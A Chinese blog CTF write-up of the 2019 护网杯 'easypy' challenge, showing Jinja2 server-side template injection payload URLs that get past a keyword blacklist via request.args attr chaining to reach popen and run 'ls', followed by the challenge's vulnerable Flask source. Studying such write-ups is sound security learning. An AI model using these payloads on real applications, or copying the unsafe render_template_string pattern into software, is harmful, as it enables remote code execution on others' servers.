Hu3sky's blog

2019护网杯esaypy

Word count: 440 / Reading time: 2 min
2019/09/06 Share

前言

本次护网杯 4道web, 两道python,其中一道0解ssrf python,一道ssti,一道java web好像也是0解,然后一道web+逆os。。。
运气比较好,通过第一题的0解 python ssrf扫出了还没开放的ssti。。以为是ssrf的第二步。。然后ssti题目一上,就把flag交了,拿了一血

easypy

过滤及其残忍

绕过方法是动态传参

能够获取到str类

image

1
2
3
4
5
http://49.232.103.198:57666/render?data={{%22%22|attr(request.args.param)|attr(request.args.mro)|attr(request.args.sub)()|attr(request.args.item)(77)|attr(request.args.ini)|attr(request.args.glo)}}&param=__class__&mro=__base__&sub=__subclasses__&item=__getitem__&ini=__init__&glo=__globals__

http://49.232.103.198:57666/render?data={{%22%22|attr(request.args.param)|attr(request.args.mro)|attr(request.args.sub)()|attr(request.args.item)(77)|attr(request.args.init)|attr(request.args.glo)|attr(request.args.ae)(%22popen%22)}}&param=__class__&mro=__base__&sub=__subclasses__&item=__getitem__&init=__init__&glo=__globals__&ae=__getitem__

http://49.232.103.198:57666/render?data={{%22%22|attr(request.args.param)|attr(request.args.mro)|attr(request.args.sub)()|attr(request.args.item)(77)|attr(request.args.init)|attr(request.args.glo)|attr(request.args.ae)(%22popen%22)(%22ls%22)|attr(request.args.re)()}}&param=__class__&mro=__base__&sub=__subclasses__&item=__getitem__&init=__init__&glo=__globals__&ae=__getitem__&re=read

image

image

拿到flag

源码
image

这过滤真的变态。。。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
# -*- coding:utf-8 -*-
from flask import Flask, request, render_template_string, render_template
from markdown import markdown

app = Flask(__name__)

@app.route('/')
def index():
    return render_template('index.html')

@app.route('/render', methods=['POST','GET'])
def convert():
    md = markdown(request.args.get('data'))
    blacklist = [ "_",
     "[",
     "]",
     "write",
     "sys",
     "os",
     "join",
     "format",
     "default",
     "last",
     "first",
     "groupby",
     "lower",
     "pprint",
     "reverse",
     "slice",
     "sort",
     "striptags",
     "ident",
     "replace",
     "truncate",
     "center",
     "forceescape",
     "urlencode",
     "escape",
     "capitalize",
     "batch",
     "d",
     "join",
     "format",
     "'"]
    for i in blacklist:
         if i in md:
             return i,400
    content = u'{}'.format(md)
    return render_template_string(content)

if __name__ == '__main__':
    app.run(host='0.0.0.0', port=20001)

原文作者: Hu3sky

原文链接: http://yoursite.com/2019/09/06/2019护网杯esaypy/

发表日期: September 6th 2019, 10:01:00 am

版权声明: 本文采用知识共享署名-非商业性使用 4.0 国际许可协议进行许可

CATALOG
  1. 1. 前言
  2. 2. easypy
Total : 101
2021
2020
2019
2018
CTF writeup 规划 学习计划 渗透测试 浏览器安全 java安全 漏洞分析 备忘录 代码审计 write-up 学习笔记 Linux Arbitrary-File-Upload CVE-Request sql注入 http协议 内网渗透 Empire git php反序列化 JavaScript python scrapy php魔法 xxe 代码执行 内网 后门 线下赛 前端 域渗透